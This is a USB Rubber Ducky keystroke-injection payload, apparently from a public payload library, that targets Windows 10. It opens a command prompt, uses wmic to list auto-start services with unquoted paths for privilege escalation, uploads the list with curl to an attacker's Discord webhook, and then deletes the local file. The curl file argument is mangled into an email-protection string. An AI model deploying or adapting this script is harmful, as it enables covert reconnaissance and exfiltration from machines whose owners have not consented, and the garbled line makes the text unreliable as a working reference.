Path: blob/master/payloads/library/exfiltration/Priv-Paths/payload.txt
2968 views
REM Title: Priv-Paths1REM Author: atomiczsec2REM Description: A payload to enumerate unqouted service paths for privilege escalation and send to a discord webhook.3REM Target: Windows 10456REM Put your discord webook in this define variable, it has the name of "d" to minimize the typing time of the rubberducky7DEFINE #d YOUR-DISCORD-WEBHOOK89DELAY 300010GUI r11DELAY 100012STRING cmd13ENTER14DELAY 50015STRING cd %HOMEPATH%16ENTER17DELAY 100018STRING wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v ^"^"^" > p.txt19ENTER20DELAY 100021STRING curl.exe -F "payload_json={\"username\": \"p\", \"content\": \"**Paths**\"}" -F "[email protected]"22SPACE23STRING #d24ENTER25DELAY 20026STRING del p.txt27ENTER28DELAY 10029STRING exit30ENTER313233